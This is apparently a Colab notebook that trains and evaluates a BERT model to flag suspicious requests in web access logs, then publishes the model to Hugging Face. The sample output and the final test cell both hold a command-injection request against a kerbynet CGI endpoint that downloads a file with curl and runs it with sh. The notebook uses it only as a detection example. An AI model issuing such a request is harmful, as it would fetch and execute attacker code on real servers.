<a href="https://colab.research.google.com/github/u-haru/log-inspector/blob/master/TransformAnnormalyLog.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [None]:
!pip install simpletransformers

In [None]:
#@title Generate dataset
import pandas as pd
import numpy as np
import logging

# Fixed seed: the sub-sampling, the shuffle and therefore the train/eval split
# are identical on every "Restart & Run All".
SEED = 42
# Upper bounds on how many rows of each kind end up in the working set.
N_SOCKET_IO = 500
N_SAFE = 6000
N_SUSPICIOUS = 3000

alldf = pd.read_csv("/content/drive/MyDrive/LogInspector/log_predicted.csv")
df = alldf[["path","referrer","useragent","predict"]].copy()
# Map negative predictions to 0; the cells below treat 1 as "safe" and 0 as "suspicious".
df.loc[df["predict"] < 0, "predict"] = 0
# NOTE(review): duplicates are not removed, so identical requests can land in
# both the train and the eval split.
# df = df.drop_duplicates()

# socket.io requests are far too numerous, so only a sample of them is kept.
# regex=False matches the literal text "socket.io" ('.' is not a wildcard) and
# na=False keeps the mask strictly boolean even when a path is missing.
is_socket_io = df["path"].str.contains("socket.io", regex=False, na=False)
socket_rows = df[is_socket_io]
sock = socket_rows.sample(min(N_SOCKET_IO, len(socket_rows)), random_state=SEED)
df = df[~is_socket_io]

safe_rows = df[df["predict"]==1]
sus_rows = df[df["predict"]==0]
print("data length:%d; safe:%d; sus:%d"%(len(df),len(safe_rows),len(sus_rows)))

# min(...) avoids a ValueError when a class has fewer rows than requested.
ok = safe_rows.sample(min(N_SAFE, len(safe_rows)), random_state=SEED)
no = sus_rows.sample(min(N_SUSPICIOUS, len(sus_rows)), random_state=SEED)

df = pd.concat([ok,no,sock])
df = df.sample(frac=1, random_state=SEED).reset_index(drop=True) # shuffle

print("dataframe length:%d"%len(df))

# Build the training data: one [text, label] pair per access.
# Zipping the columns is equivalent to the row-wise loop but avoids the cost of
# materialising a Series for every row.
all_data = [
  ["path: %s; ref:%s; ua:%s;"%(path, referrer, useragent), label]
  for path, referrer, useragent, label in zip(df["path"], df["referrer"], df["useragent"], df["predict"])
]
data_df = pd.DataFrame(all_data)

# Split: first 75% for training, remaining 25% for evaluation.
p = int(0.75 * len(data_df))
train_df = data_df.iloc[:p, :]
eval_df = data_df.iloc[p:, :]

# Logging setup: INFO in general, but only warnings from the "transformers" logger.
logging.basicConfig(level=logging.INFO)
transformers_logger = logging.getLogger("transformers")
transformers_logger.setLevel(logging.WARNING)

data length:649636; safe:646090; sus:3546
dataframe length:9500


In [None]:
#@title Training
from simpletransformers.classification import ClassificationModel
import torch

# Options handed to ClassificationModel through its `args` parameter.
param = {
  'reprocess_input_data': True,
  'overwrite_output_dir': True,
  'num_train_epochs': 6,
  'use_early_stopping': True,
  'learning_rate': 1e-5,
}
# Colab form fields. NOTE: `eval` shadows the Python builtin of the same name
# for the rest of the kernel session.
train=False#@param {type:"boolean"}
eval=True#@param {type:"boolean"}
use_cuda=True#@param {type:"boolean"}
localmodel=True#@param {type:"boolean"}
MODELPATH="/content/drive/MyDrive/LogInspector/TransModel"#@param {type:"string"}

# Start either from the checkpoint stored under MODELPATH or from the stock
# "bert-base-cased" weights, and only use CUDA when it is actually available.
if localmodel:
  model_source = MODELPATH
else:
  model_source = "bert-base-cased"
cuda_enabled = use_cuda and torch.cuda.is_available()

# Create the model.
model = ClassificationModel(
  'bert',
  model_source,
  num_labels=2,
  use_cuda=cuda_enabled,
  args=param,
)

if train:
  # Train on the training split built by the dataset cell.
  model.train_model(train_df)
if eval:
  # Evaluate on the current `eval_df` and show the metrics dict.
  result, model_outputs, wrong_predictions = model.eval_model(eval_df)
  print(result)



  0%|          | 0/2375 [00:00<?, ?it/s]

Running Evaluation:   0%|          | 0/297 [00:00<?, ?it/s]

{'mcc': 0.9942118401197232, 'tp': 1612, 'tn': 757, 'fp': 0, 'fn': 6, 'auroc': 0.9999175393076241, 'auprc': 0.9999619326451163, 'eval_loss': 0.01790157122472353}


In [None]:
#@title Test model
# Pick one random access from the working set and format it exactly like the
# texts the model was trained on.
testdata = df.sample(1).iloc[0]
access_text = "path: %s; ref:%s; ua:%s;"%(testdata["path"], testdata["referrer"], testdata["useragent"])
print(access_text)

# Predict: `predictions` holds the class per input, `raw_outputs` the raw model outputs.
predictions, raw_outputs = model.predict([access_text])
print(predictions, raw_outputs)
# A truthy label (1) means "safe", label 0 means "suspicious".
verdict = "safe" if predictions[0] else "suspicious"
print("This access is " + verdict)

path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;"; ref:-; ua:-;


  0%|          | 0/1 [00:00<?, ?it/s]

  0%|          | 0/1 [00:00<?, ?it/s]

[0] [[ 5.10902023 -5.65708065]]
This access is suspicious


In [None]:
#@title Save model
# Create the MODELPATH directory (no error if it already exists) and copy
# everything under the local `outputs` directory into it, overwriting existing files.
# NOTE(review): `outputs` is presumably where training wrote the model, since no
# output directory is configured in `param` — confirm. $MODELPATH is expanded
# unquoted, so a path containing spaces would break these commands.
%mkdir -p $MODELPATH
%cp -rf outputs/* $MODELPATH

In [None]:
#@title Evaluate on many accesses
# Evaluate the model on a reproducible random sample of the full log.
# NOTE(review): the sample is drawn from `alldf`, so it can overlap with the
# rows the model was trained on; treat these metrics as optimistic.
EVAL_SAMPLE_SIZE = 10000
EVAL_SAMPLE_SEED = 42

# min(...) keeps the cell working when the log holds fewer rows than requested.
eval_sample = alldf.sample(min(EVAL_SAMPLE_SIZE, len(alldf)), random_state=EVAL_SAMPLE_SEED)

# One [text, label] pair per access; any prediction that is not positive
# becomes label 0, matching the labels produced by the dataset cell.
eval_data = [
  ["path: %s; ref:%s; ua:%s;"%(path, referrer, useragent), (label if label > 0 else 0)]
  for path, referrer, useragent, label in zip(
    eval_sample["path"], eval_sample["referrer"], eval_sample["useragent"], eval_sample["predict"]
  )
]

# Deliberately NOT named `eval_df`: that name belongs to the held-out split of
# the dataset cell, and overwriting it would silently change what the Training
# cell evaluates on when it is re-run.
eval_many_df = pd.DataFrame(eval_data)
result, model_outputs, wrong_predictions = model.eval_model(eval_many_df) # evaluate
print(result)

  0%|          | 0/10000 [00:00<?, ?it/s]

Running Evaluation:   0%|          | 0/1250 [00:00<?, ?it/s]

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}


In [None]:
#@title Print all suspective access
# Dump path, referrer and user agent of every row labelled 0 in the working set.
suspicious = df.loc[df["predict"]==0, ["path","referrer","useragent"]]
for record in suspicious.itertuples(index=False, name=None):
  print(*record)

In [None]:
# Recursively delete the local `outputs` directory.
%rm -r outputs

Evaluation on the held-out split (2,375 rows):  
{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

Evaluation on 10,000 randomly sampled accesses:  
{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}

In [None]:
# Log in to the Hugging Face Hub through its CLI (run before the upload cell below).
!huggingface-cli login

In [None]:
from huggingface_hub import HfApi

# Upload the contents of MODELPATH to the "u-haru/log-inspector" model repository.
api = HfApi()
upload_target = {"repo_id": "u-haru/log-inspector", "repo_type": "model"}
api.upload_folder(folder_path=MODELPATH, **upload_target)

In [None]:
from transformers import pipeline

# Load the published model through the plain transformers pipeline and classify
# a minimal request (root path, no referrer, no user agent).
inspector = pipeline(task='text-classification', model="u-haru/log-inspector")
sample_access = 'path: /; ref:-; ua:-;'
inspector(sample_access)

[{'label': 'LABEL_1', 'score': 0.999984622001648}]

In [None]:
from simpletransformers.classification import ClassificationModel

# Rebuild `model` from the published "u-haru/log-inspector" checkpoint.
# Relies on `use_cuda`, `torch`, `param` and `pd` from the earlier cells.
cuda_enabled = use_cuda and torch.cuda.is_available()
model = ClassificationModel(
  'bert',
  "u-haru/log-inspector",
  num_labels=2,
  use_cuda=cuda_enabled,
  args=param,
)

# Two hand-written accesses: a command-injection attempt labelled 0 and a plain
# request for "/" labelled 1.
injection_access = 'path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://0.0.0.0/zero;sh zero;"; ref:-; ua:-;'
plain_access = 'path: /; ref:-; ua:-;'
data = [[injection_access, 0], [plain_access, 1]]

result, model_outputs, wrong_predictions = model.eval_model(pd.DataFrame(data))
print(result)



  0%|          | 0/2 [00:00<?, ?it/s]

Running Evaluation:   0%|          | 0/1 [00:00<?, ?it/s]

{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}
